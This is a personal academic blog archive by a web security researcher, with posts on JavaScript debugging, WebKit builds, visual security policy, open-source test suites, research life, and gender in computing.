terriko: (Pi)
2012-06-25 11:14 am
Entry tags:

object object object... goose?

In the course of my thesis work, I made myself a little Firefox plugin that tells me where the javascript/dynamic parts are in a page. It's a fun little thing, just puts some big coloured boxes up, and I used it to help understand how people were using javascript in practice. It's one of those things I should probably release just 'cause it's fun, but I didn't have time to maintain in any meaningful way so I didn't get around to it.

Anyhow, I pulled it out last week to see what state it's in because I want to adapt some ideas from it, and it wasn't working. Which is odd, 'cause it's really quite simple. The core is just a loop that goes through each page element and looks for stuff like onmousover events:


var allTags = document.getElementsByTagName("*");
for each (var tag in allTags) {
// ... do some stuff
}


And in debugging it, I've learned that getElementsByTagName("*"), which apparently used to return all the tags as objects, is now returning all the tags as well as, inexplicably, a number. It's not the same number for every page, and most of them seem to be around one thousandish on the simpler pages I was trying to test. Which sort of makes me think that maybe it's returning the number of tags, or that it sometimes returns an ordinal index for a single tag instead of an object, but why?

As it turns out, it didn't take much to get my add-on back up and running, just a quick check to see if the "tag" in question was in fact an object. But I'm left with a question: why has this changed in Firefox since I initially made the add-on? I'm not even sure where to ask, since it doesn't seem like it's a thing that changed in the specs. I'm recording it here for posterity so I remember to try to look it up later, but if you happen to know what's going on, please get in touch!
terriko: (Default)
2012-03-02 04:13 pm

"[Being different] over a whole lifetime, adds up to an enormous amount of needless trouble."

I'm re-reading Richard Hamming's talk on You and Your Research because I felt like I needed the kick in the pants to do great work this month after some very busy months of doing necessary but not necessarily great things.

In this reading, I was struck by this anecdote:

John Tukey almost always dressed very casually. He would go into an important office and it would take a long time before the other fellow realized that this is a first-class man and he had better listen. For a long time John has had to overcome this kind of hostility. It's wasted effort! I didn't say you should conform; I said ``The appearance of conforming gets you a long way.'' If you chose to assert your ego in any number of ways, ``I am going to do it my way,'' you pay a small steady price throughout the whole of your professional career. And this, over a whole lifetime, adds up to an enormous amount of needless trouble.


On a surface level, I've long believed this is true. I've been long primed in the art of social hacking, first by my father and more recently as a security researcher/hacker. Anyone can watch the subtle variations on how I dress on teaching days or days when I'm going to the bank and you'll note that I pay attention to fitting in to the environment and manipulating the way in which I'm perceived. But as a child of the Internet, more or less, my experimentation hasn't limited to physical presentation. Especially as a teenager, I spent a lot of time grossly mis-representing my age and gender as well and watching how that changed my interactions with folk.

But what gets me this time is the end of that quote: "[If you don't appear to conform,] you pay a small steady price throughout the whole of your professional career. And this, over a whole lifetime, adds up to an enormous amount of needless trouble." Sometimes it's important to change the system, but sometimes you just want to get stuff done.

I can dress the part, but I don't generally change my gender presentation in real life. Is my female-ness adding up to an enormous amount of needless trouble over my lifetime given that I work in a field where that's going to make me non-conforming? I suspect it is, although I'm fortunate enough that my gender presentation is often canceled out by my racial makeup (Asian girls are totally good at math, don'tcha know?) so I can console myself by saying maybe it's not as enormous as it might have been. But not every person who doesn't fit the norm for their field has that consolation prize. Are we all paying the price of being different?

It's easy to get a little saddened by this. All that time explaining that no, I really am a techie, has added up to a lot of time I'm not having amazing conversations and doing great work. But before you get too saddened about how your hard-to-hide features like race/age/gender are affecting your ability to Do Great Things, you should stop and listen to Duy Loan Le's excellent 2010 Grace Hopper Celebration Keynote. In it, she talks about what she does to fit in to environments where she felt that letting go of her ego made it possible for her to get more good work done. I think it's really worth a listen, especially if fitting in isn't just a choice of what suit to wear for you.

terriko: I am a serious academic (Twlight Sparkle looking confused) (Serious Academic)
2012-02-04 01:34 am
Entry tags:

Ants & the academic dream

When I was an undergraduate, I found that university really wasn't living up to my expectations of stimulating, interesting people and ideas.

But today, I was totally living the academic dream.

We had a visit from a leading expert on ant behaviour. This wasn't about computer ant algorithms; she studies real live ants. We started off the day with her talk on the Turtle Ants she's been studying in Mexico, a talk filled with pictures of ants and paths and grad students on ladders pointing at the trees. A talk filled with speculation about behaviour and patterns and analogies to search in computer networks and bifurcation of biological trees. Over the course of the day, the group talked ants, bees, simulations on the computer and using robots, immunology, flu and t-cells in the lung, patterns and theories. It was the kind of conjunction of ideas from multiple disciplines where things were just clicking and questions and potential experiments started getting debated.

Biochemistry from my scientist parents, ecology and field work from Macoun Club, immunology from the above plus my own master's research, algorithms from math and CS... I was pretty proud of myself for knowing the jargon pretty much across the board and being able to keep up. I love that I'm with a group where seemingly disjoint backgrounds are consistently recognized as a huge advantage, and my own particular background fits right in.

I learned a bunch about ants and flu today. My notebook is filled with doodles of ants and cells doing stuff. Apparently turtle ants, since they have paths in the trees, sometimes get the paths broken when the wind blows, and the ants just back up and wait for the wind to blow the branches back so they can keep going. I learned that swine flu's replication rates in cells are a hundred times higher than avian flu (and ~20 times more than regular flu) but avian flu does other things to suppress immune response. I learned some about how T-cells get into the lungs and find infection despite the fact that they don't seem to move fast enough to explain how well we handle infection. And I got to watch people putting ideas together in ways that might result in using experiments in ants to try to explain things that would be much harder to test in the lungs, and so many ideas that probably just couldn't happen anywhere else.

So if you've been wondering why the heck I moved here despite the many downsides about the US/desert/altitude/regional poverty/city, etc.... this is why: Cutting edge research at the conjunction of biology, computing, and maybe a few fields besides. Even if I decide to do something else once my contract is played out, this has already been amazingly worthwhile, and with my own project starting to take shape, I'm pretty sure it's just going to get better!
terriko: I am a serious academic (Twlight Sparkle looking confused) (Serious Academic)
2011-12-05 02:26 pm
Entry tags:

Looking for open source projects with good test suites

This was originally posted on But Grace, but I don't want my regular blog to wind up devoid of technical content so I'll be crostposting all my posts from there in their entirety, I suspect.

One of the cool things going on at work is some software we have that automates the creation of small bug fixes. We're looking to try it on some more active projects with real bugs, but we need projects with reasonable test case coverage so that the automated system can also ensure that it isn't causing other things to break in making the fix. Basically, we're potentially offering up a bunch of free bugfixes if your open source project has decent test cases. Pretty good deal, I hope.

Open source projects with good test suites



But how do we find software with good test cases? Here's a few I know of off the top of my head:

Open source projects with good test suites


Name/URLTest suite?Notes
Firefox A brief search turns up some automated tests My fuzzy memory suggests there was more than these...
Gnumeric Extensive regression tests for each function The function tests are in .xls spreadsheets, so we could potentially apply them to other spreadsheet software.
SQLite They claim extensive test coverage Very promising!
Webkit (Chrome, Safari) a brief web search turns up regression tests for javascript I believe the Chromium project has even more tests


Can anyone suggest other software or more details (and better links) on the things I have mentioned already?

Open source routing software



For various reasons, I've been encouraged to try experiments on open source routing software. There's some existing academic literature on the types of bugs found in open source routers, and it seems like our automated patch creation system would be a good fit especially since router bugs often cause huge outages or security problems and having a temporary patch to solve the problem right away could be a huge boon.

My query on twitter generated a nice list of open source router software, but no one seems to know anything about test suites. Here's a table summarizing what I've found thus far:

Open source router software test suite information



Name/URLTest suite?Notes
Click Unknown Nothing obvious, and given that it's on a university website, I'll be shocked if it has testing. ;)
dd-WRT Unknown Nothing obvious in the wiki, but there were lots of hits I haven't investigated.
OpenWRT Unknown Clearly there was interest in automated test suites in Jan 2011 but it's unclear to me if these are now around somewhere. Need to look more.
pfSense No evidence of a test suite Searching the dev wiki for "test" yields nothing likely, so I'm guessing there isn't one.
Quagga There is a tests/ directory, but it looks unsuitable "make test" doesn't work and "make check" pokes a bunch of directories but doesn't seem to do what I need. There's a directory called tests/ in the repository, but I'm not sure what it does. I can run the tests manually, but the output is currently meaningless to me. No one answered my question on #quagga, although another open source friend on #kernel.org suggested that the test suite may have been abandoned.
Tomato No evidence of a test suite The web site contains nothing useful, so if there is a test suite, it's likely being provided by someone else.
XORP There is a tests/ directory, unsure if suitable but look promising These look promising, but I'm having some build errors and haven't been able to run them yet


You'd think, perhaps, that reasonable test suites for routers would already exist. A generic test suite would be totally sufficient for my needs at the moment. And in fact, I've found a set of routing tests from the University of New Hampshire InterOperability Laboratory, but while their tests are well-described, it doesn't look like something we can run locally and repeatedly as we'd need to in order to test the auto-generated patches. I haven't yet found others.

Let's be clear: I don't really care what the router supports in great detail. The important thing for these tests are that there be a good test suite, and preferably a good bug queue so we can grab candidate bugs and bug test cases to try to solve them. Generally speaking, the bugs have been easier to find than the regression tests.

In summary...



I am looking for:

1. More information about router test suites.
2. Updates to my current tables of information. This represents a morning's work, so I'd be shocked if they're perfectly correct.
3. Any open source/free software projects with good test suites (and preferably good bug queues).

Again, the key here is that I need good test suites. I'm most interested in routing software at the moment, but I'm building up a list of alternative ideas if that doesn't pan out, so anything with good automated tests I'll be able to run repeatedly is of potential interest. We've got access to a reasonable amount of computing power, so heavier weight tests are fine as long as they aren't going to take all month to run.

We would love to contribute any fixes we find back to the community, so if you think your project might qualify please get in touch! I think the end result is going to be awesome for all involved: free bug fixes for the project, more impressive real-world validation of our automated patch creation system, and maybe even an academic paper out of it for some of the folk around here.
terriko: (Default)
2011-06-28 04:42 pm
Entry tags:

Uniquely defining an HTML element

As some of you may know, my last paper was on visual security policy (ViSP), a neat idea I had about how to add security policy to a website in a way that was more in line with how sites are designed. I based it on my own knowledge working as a web designer, as well as ideas from a variety of friends who have or do work in the web space professionally and not.

You can read my presentation the larger run-down or read the paper, but the idea behind ViSP is that it's sometimes very useful to subdivide pages so that, say, your advertisement can't read your password, or that funny video you wanted to embed doesn't get access to post blog entries, or whatever. Sadly, right now anything embedded in the page gets access to anything else unless some awfully fancy work has been done to encapsulate parts of the page. (And given how much people tend to care about security in practice, this doesn't get done as often as it should.) We currently just trust that any includes will play well, which is super awkward since malicious code can be inserted into around 70% of websites and you can't very well expect malicious code to play nicely.

Anyhow, I digress.

I'm updating this particular policy tool so that I can generate some policies to test, because I'm tired of building them manually, and my not-terribly-scientific method of clicking randomly on things to make policy has turned up a problem: what happens if you want to set policy for an element that's just one of many paragraph tags or whatever, not assigned an id?

With ViSP, we assigned an index based on how many such tags we'd seen, but I figured while I'm updating this surely I could find something more standard...

Turns out, no, that really is the best way to do it. At least according to the selectors API, which includes a nth-of-type() pseudo-class that seems to do pretty much what I want.

So now, if you're using my tool and wanted to define policy for a given tag, any given tag, we can make that work for you by building up a CSS selector to find it. Of course, it'd probably be cleaner to read if you only set policy on tags with ids or classes, but I don't have to require that as an additional hurdle to policy creation. I figure this is likely a net usability win when it comes to policy generation, and let me tell you, security policy is not a field known for usability wins. (So much so that if I google search for the words security policy and usability... I see a post by me on the front page suggesting usability studies on CSP.)

Anyhow... Thanks to having to learn querySelector earlier, I was already primed to create querySelectors for uniquely defining tags. Thanks Mozilla documentation! You're a terrific coding wingman, introducing me to all these awesome apis. ;)
terriko: (Default)
2010-10-10 12:24 am

Meritocracy? Might want to re-think how you define merit.

This has been cross-posted from Geek Feminism, but I found this research really fascinating so you're getting a full copy here too.

Rock on!
You might think if you put together a lot of smart people, you'd get a smart group, but new research into group intelligence shows that's not always the case. (For those of you who don't have access to online journal subscriptions through your local library or university, there are more details in the Carnegie Mellon University press release.)


What we found is that the intelligence of the team members was not significantly related to the collective intelligence, either positively or negatively.

[...]

Our first observation and the one that surprised us the most was that the proportion of females in the group seemed to be strongly predictive of the collective intelligence of the group.


However, when they looked more closely they realised that it wasn't the gender that mattered, but rather the social sensitivity of the group members (previous studies had shown that women tend to score more highly in social sensitivity).

It's not the intelligence of the group members that matters; it's their social sensitivity.

So the more your group members were socially sensitive, the better the group performed in measures of collective intelligence. The key here was that group members need to collaborate, and to do that they needed those social skills to help them work together. This includes some different conversational patterns: groups where one or two people dominated conversations exhibited low collective intelligence, while groups where more people contributed had higher collective intelligence.

This scientific research is potentially a big blow to the standard "meritocracy works" theory often espoused in open source and computing groups. Standard meritocracy rules say you do clever things and you get accepted, and this will make for perfectly good teams. But given that there's often bias that dismisses "soft skills," it turns out that folk may actually be using typical geek meritocracy rules to weed out some of the people we need to make the group most effective as a whole.


Some of my female colleagues would like to conclude that you simply just need to hire more women. While that might be easier, what it really suggests is that you need to pay attention to what people refer to as these "softer skills" and thinking about who's going to be a good team player, not necessarily focused solely on individual achievement, individual accomplishments.


So if you want to claim that the best way to build tech teams is meritocracy... you might want to think more carefully about how you define merit.


Rock show DS



The quotes in this article are drawn from Bob McDonald's conversation with Dr. Anita Williams Woolley, the lead author, on the Quirks and Quarks interview aired October 9. You can download the podcast of the segment on collective intelligence here.
terriko: (Default)
2010-07-08 04:47 pm

HotSec & LinuxCon or How I wound up speaking in 2 cities in 3 days (totally different topics too!)

My paper was accepted to HotSec! This is the web visual security policy research I've been working on for a while in various forms, but this is my first proper paper on the subject (although some of the related issues were touched upon in my W2SP paper). Getting in to HotSec is rather a big deal, as it's among the top publishing venues available to me. I was one of 11 papers chosen (out of 57). Go me! So I'll be heading down to DC on August 10th to present it. If you're curious, we should have the final camera-ready copy done in a few days.

My HotSec acceptance causes a bit of a logistical problem, though, since I've also been accepted to speak at LinuxCon on August 12th. It's a bit of a long story as to how I ended up applying at all, but the short and relevant part is just that I wasn't originally planning on submitting to HotSec and didn't realise I'd have such a conflict. (There's a longer story involving speaker diversity issues and good folk willing to go out of their way to work on solving them.)

Anyhow, I really *should* send my regrets to LinuxCon as, academically speaking, it makes a lot more sense for me to go to USENIX Security immediately following HotSec. Especially this year, as I'm hoping to graduate soonish (more ish than soon; don't get too excited) and should be networking as much as possible. But I chatted with my supervisor, and he agreed that it's a bit of a toss-up as to which is more valuable to me: it's nearly as likely that the person I need to meet will be at LinuxCon and that I'll wind up finding a job through open source connections. Raising my open source speaking profile may be just as useful.

What's clear is that Mailman benefits more if I go to LinuxCon, since I'm going to be talking about upcoming awesomeness in version 3.0. The other day, I had someone comment that they didn't even realise Mailman was in active development... ouch. I think getting people interested now, while we're in alpha, is probably absolutely perfect timing. Plus I'm hoping to have some nice stuff to show off from my excellent GSoC students, if they're willing to let me talk about what they've been doing with the archives, and maybe some of the other projects as well.

If you're interested in coming out to LinuxCon, they helpfully gave me a 20% discount code to share. Drop me a note and I'll pass it along (they asked we not just post the code publicly, but I can pop it in a private post later). If you can offer me a job then I'll be able to tell my supervisor I made the right choice. Heh. No, seriously, it's just nice to see people.

Anyhow, I'll make my final decision when I see if the travel arrangements are ridiculous, but it *should* be relatively easy to go from DC to Boston after HotSec, so let's hope this all works out!
terriko: (Default)
2010-06-18 03:35 pm
Entry tags:

Compiling at last

Of course, now I've completely forgotten what I was going to do once I got this compiling...

Anyhow, for my own records, here's what I had to do to compile the WebCore portion of Webkit using XCode 3.1.4 (heh) under OS X 10.5.8.


  1. Follow these instructions for debugging.
  2. Make sure to compile JavaScriptCore (to get rid of the JavaScriptCore/Platform.h errors). Note that is has to be compiled into the same directory as WebCore.
  3. Edit CSSPropertyNames.h to add a property for CSSPropertyWebkitDashboardRegion (I was getting a bunch of errors saying it wasn't defined in that scope)
  4. Make sure that the WebCoreSQLite3 library can be found by adding WebKit/WebKitLibraries to the library search path.


Doesn't seem so bad, now that I've got them enumerated. I'm guessing the CSSPropertyWebkitDashboardRegion thing is an actual bug in how the scripts are called in xcode? Guess it's generated, and I need some flag to make it generate correctly? Anyhow, this works for now. Pity it took a couple of days to get it sorted out.
terriko: (Default)
2010-06-17 03:06 pm
Entry tags:

Following up on following the instructions

As a follow-up to yesterday's irked post. This post is largely for myself in case I wind up getting these or similar errors again and can't remember what I did.

Context: I'm hoping to use WebKit to try out some research ideas. It builds fine using the build-webkit script provided, but balks when I try to build it in XCode.

If you're getting a pile of errors when building WebKitCore (e.g. following the instructions here) that are all about JavaScriptCore/Platform.h, then the problem is just that you need to build JavaScriptCore first. And make sure that you've got the BuildOutput set to be in WebKit/WebKitBuild for both, or they won't see each other.

Also, this seems like a nice summary of the cleanup steps if you're trying to make sure you're not using any old files.

It's still not building perfectly for me, but I'm not getting 10k errors anymore so clearly I'm getting closer to having this working. ;) Of course, I've also discovered the WebKitTools/Scripts/debug-safari script which runs it in gdb, so I probably don't need to be doing this anymore to have a debugger, but now I figure it's a halfway decent learning experience.

The biggest problem with webkit other than my current build errors is that a full build takes an hour. That's a lot of time to kill while my code's compiling. And I'm so used to working with web code/scripts that I'm not used to optimizing my time while the compiles happen! I've already caught up on my email, folded the laundry, had a shower... and now I'm blogging while I try to let WebCore finish and see if it gets more than the 4 errors it's already got.
terriko: (Default)
2010-06-16 04:13 pm
Entry tags:

Note to self: try following the instructions

You know what's annoying? Trying to fix include paths in my build when what I really needed to be doing was following the instructions.

I was feeling really foolish when I saw that, but now that I've followed said instructions, it still doesn't work... Oh, coding. When you sometimes don't know if you've just typed the wrong character somewhere or if the whole thing is horribly broken. I'm sure this will be very obvious when I look at it later, but I've got a rehearsal to get to.
terriko: (Default)
2010-04-07 11:23 pm
Entry tags:

Demonstrating my awesome presentation skillz

Tomorrow, I'm presenting as part of the Celebration of Women in Science and Engineering at Carleton. It's going to be a really fun event showcasing some of our female students, faculty and staff. In fact, you can hear us talk about it on CBC Radio 1 sometime early tomorrow morning... I'm guessing around 6:20am, but I foolishly forgot to ask.

To give you a taste of my research talk, here's a couple of slides. But you'll have to come for the whole thing to learn about how to cause Facebook drama and call it science, or how I managed to fit a LOLcat into my professional research presentations.





I'm on to talk about my research at 2:30 Thursday (tomorrow!) in 5115HP. Or 11:30 if you want to see me be even more snarky regarding misconceptions and computer science.
terriko: (me)
2010-02-04 05:30 pm
Entry tags:

These Proposal Defense Date

I now have a proposal defense date: March 3rd.

I believe the paperwork is still going through, so I won't assume the date is set in stone 'till I get the official call confirming that that works for all involved. But the upshot of this is that I need to get the final draft of the proposal to my committee by Feb 10th. (Oh, did I mention I have a committee? They're awesome.)

Anyhow. Me. Proposal. Less than a week from now.

It's almost there, so while there may be some terror and hysteria happening, it's mostly relief. Promise! But there is still work to do, so if I'm scarce for a bit, don't be too surprised.
terriko: Yup, I took this one. The eyes are paper, not photoshop (chair)
2010-01-25 07:16 pm
Entry tags:

Re: [*****SUSPECTED SPAM*****] Investigating the Role of Proximity on OSS Project Innovativeness and Success

This is a letter I just sent to several researchers who were conducting a survey on open source developers. As you can see below, I never answered the survey, and I explain why in hopes that future researchers will learn from these mistakes and present more compelling research initiatives.

Dear Barbara Scozzi and Antonio Messeni Petruzzelli,

I just wanted to let you know why I never took part in your survey, despite the fact that I have taken part in similar surveys in the past.

The first reason should be readily apparent from the subject line of this message: your message really looked like spam. This was especially true when I received multiple copies of the message from your team, to the same email address.

The second is that you sent the survey in Microsoft word (.doc) format, which seems like an inappropriate choice when contacting open source software developers. Typically, OSS developers prefer to use open source alternatives such as Open Office, and many people have been burned by years of MS Word viruses and are justifiably hesitant to open such an attachment. And honestly, I would have preferred to do a quick web survey rather than spend time opening, editing and returning a document to you. There are a variety of survey tools available and I highly recommend you investigate these options for future research. They can make the task of responding to your survey much less onerous for participants.

The third is that you managed to mis-spell my first name in the salutation of the first email I received from your research team, despite the fact that my first name is spelled correctly in the Sourceforge user data you seem to have used to find me. While this may seem minor, this sort of small rudeness did leave me with a negative first impression of your team.

Finally, you may wish to be aware that if you are reaching current GNU Mailman developers, as seemed to be the case, you may do better searching on Launchpad, which we switched to for development over a year ago, if memory serves.

You may wish to take a look at Mary Gardiner's writings regarding how best to present yourselves and your research when doing such surveys. She has a very short summary here:

http://geekfeminism.org/2010/01/04/gf-classifieds/#comment-3355

And further discussion of related issues here:

http://puzzling.org/logs/thoughts/2010/January/6/ethics

Thank you for your time, and I hope this letter helps you engage more participants in your future endeavours.

Terri
terriko: (Default)
2009-10-04 11:53 pm

Dealing with Criticism

I was going to do all kinds of GHC wrap-up blogging today, but it was not to be, so here's my post about dealing with criticism for the CU-WISE blog instead. I wrote it with academia in mind, but you'll find it applies equally to open source development (which also has a lot of peer review!), or just general life. Enjoy!


Academia can be a really harsh environment. I once got a peer review that claimed the research in our paper was "crappy." Not exactly professional language, that! The review was so bad that we had to laugh, but that doesn't mean we didn't take the criticisms they included seriously: the next version of the paper was accepted to one of the top conferences in the field, in part thanks to that reviewer's highly critical comments.

Criticism can hit people hard: I heard one woman crying in the washroom while her friend consoled her and told her that really, the prof who had told her off was being unprofessional. Sometimes when a TA tells you your assignment was terrible, when a prof makes fun of you in class, when your paper gets rejected... it's hard to know how to deal. Venting to a friend is not a bad idea, but sometimes you can do even more to build on the otherwise "crappy" experience of receiving harsh criticism.

So here's some tips from TinyBuddha.com on dealing with harsh criticism:

10 Ways to Deal with Harsh Criticism



1. Use it. If someone delivers criticism in a nasty or thoughtless way, you may tune out useful information that could help you get closer to your dreams. Put aside your feelings about the tone, and ask yourself, "How can I use this to improve?"

2. Put it in perspective. There are over 6 billion people in the world. Even though only a small percentage has had a chance to see your work, odds are the criticism came from a small percentage of that.

3. Acknowledge it isn't personal. If someone doesn't like what you're doing, it doesn't mean they don't like you. Their interpretation of your work reflects how they see themselves and the world. Everyone sees things differently. No matter what you do, you'll only please some of them.

4. If it is personal, realize that makes the criticism even less relevant. If someone doesn't like you as a person for whatever reason, their thoughts on your project proposal hold no weight. Your job, then, is to let them make their choice--not liking you--and stop giving them power to hurt you.

5. Turn false criticism back on the critic. If someone says something harsh, seemingly without merit, realize it speaks more about them than you. Your work is not the problem--their attitude is.

6. Look for underlying pain. When someone is unnecessarily cruel, they generally want to get a rise out of someone--often as a way to deflect whatever pain they're carrying around. When you see the pain under someone's negativity, it helps turn your anger, frustration, and hurt into compassion and understanding for them.

7. Look at the critic as a child. Most children are honest to a fault, yet adults take their feedback with a grain of salt because there's much they don't understand about the world. The same can be said about your critic; he doesn't understand what you're trying to do, and therefore is missing some of the picture.

8. Define your audience. Whatever you're trying to accomplish, odds are it's meant to help a specific group of people. If you're building a web application for mothers, criticism from a 65-year old man carries a different weight than criticism from a mom.

9. Take the opportunity to develop a thicker skin. If you'd like to help many people, you'll have to listen to a lot of others who think you're doing a bad job. It's the nature of reaching a large audience--a portion will be unimpressed, no matter what you do.

10. Challenge yourself to keep going. One of the hardest parts of fielding criticism is letting go and moving forward. Don't let one person's negativity convince you to stop what you're doing. Whether you change your approach or keep doing the same thing, keep going. No matter what.
terriko: (Default)
2009-05-09 05:14 pm

Beautiful things are more functional

In the course of doing some thesis research, I stumbled across this fascinating paper in aesthetics and usability.

I'm not sure I've ever read a paper where the researcher seems so thoroughly flummoxed by his/her results.

The idea of the study was to test whether objects rated as more beautiful would also be rated as more functional. The author, I suspect, found this idea faintly ridiculous, but previous work in Japan had shown that people did indeed rate prettier banking machine interfaces as more usable. He suspected that perhaps this was just an effect related to Japan and its "culture is known for its aesthetic tradition." He would repeat the study in Israel, where the culture has a stronger emphasis on action over form. Surely, he thought, the practical Israeli people would not be as affected by aesthetics.

But what happened? "Unexpectedly high correlations" The author says, "usability and aesthetics were not expected to correlate in Israel" but they did. Oh, they did.

Even though I'd not read this paper until this week, it's something I'd noticed in doing basic testing of my web projects (back when I made more of a living writing web code rather than deconstructing and mocking... errr... inspecting its security). I used to test designs on clients, friends and invariably, I'd get more positive results (and useful!) feedback if I spent the bit of extra time to make the first draft look clean, if still aesthetically simple. Pretty matters.

It's kinda nice to have a couple of scientific papers to back up one's gut feelings, eh?




Want more than a gut instinct to explain why attractive things work better? Don Norman suggests an answer in his book, Emotional Design: Why We Love (or Hate) Everyday Things. (I noticed it when seeing who had referred to this study and am working my through it. Research is fun!)

The theory goes like this: pretty things change your emotions in a positive way, make you happy, less stressed. Your emotional state changes your perceptions and ability to work. When you are happier, you often find things easier to use. Thus, pretty things are easier to use. And ugly things make you more easily annoyed, stressed out. Stress makes you perform poorly. Thus, ugly things are harder to use.

And in honour of the new Star Trek movie, I'll finish with a single word:

Fascinating.
terriko: (Default)
2009-05-05 01:41 pm
Entry tags:

On the subject of typography & design vs security policy

The story thus far:

Terri, stuck in one of those bits of PhD that seem never-ending, realized that she needed two new sections in her thesis: one on typography & design, to prove a point about web pages and one on security policy, to prove a point about how difficult getting it right can be. But then all of her hardware decided it needed replacing Right Now, thus making it nigh impossible to work, and after spending entirely too long debugging and replacing stuff, she decided to console herself by buying a zombie game to test her new network equipment. That's a perfectly valid response to stress, really.

We now return to her regularly scheduled thesis development...



In the course of working on these two pieces at more or less the same time, I've noticed that security policy shares a bit more with visual page design than I might have initially thought.

Security policy is designed to be both rigid and flexible. The idea is that if you do it right, it should be hardened, unbreakable, no loopholes. But the policy languages have to be sufficiently flexible to accommodate varied types of policy and capture desires from different organizations.

Graphic design is one of places where "the rules are made to be broken." Flexible first, but with a rigid structure to help guide you. And practical constraints regarding readability, screen sizes, printing sizes, etc. also affect design choices. It feels a bit like it's backwards from security policy: in graphic design, the flexibility is stressed first, and the rigid constraints are acknowledged after the fact.

There's a lot more math than one might expect in design. And in security policy. I took the grad security course at Ottawa U, and wanted to smack some of my colleagues as they complained incessantly every time the prof so much as mentioned math. I don't know how they thought they were going to comprehend basic cryptography without at least a few equations... but after reading parts of The Elements of Typographic Style last night, I wonder how many designers expected to learn about the golden mean and regular polygons? I'm a mathematician originally, so I delight in finding such things, but I know that's atypical in general (less so among geeks).

Good security policy is nigh invisible to the legitimate users. If it prevents you from doing your job, it's probably not good policy, right? Ditto for graphic design, in some ways. It seems weird to talk about a visual medium as "invisible" but in a lot of cases, you want the content to be doing the talking -- the design is a way to frame it nicely. It should be quietly doing its job, making the viewer feel better about the content, without the viewer noticing.

Of course, invisibility isn't always the desired thing for either medium: Sometimes you want attackers to see that big impenetrable wall. Sometimes you want someone to be drawn in by the artistry of a design. But a real whiz about either security policy or design is likely to need to be able to cover both ends of the spectrum (and a good chunk in between).

I'm not sure entirely where I'm going with this train of thought, but I thought it was kind of interesting that they're not as dissimilar as one might think.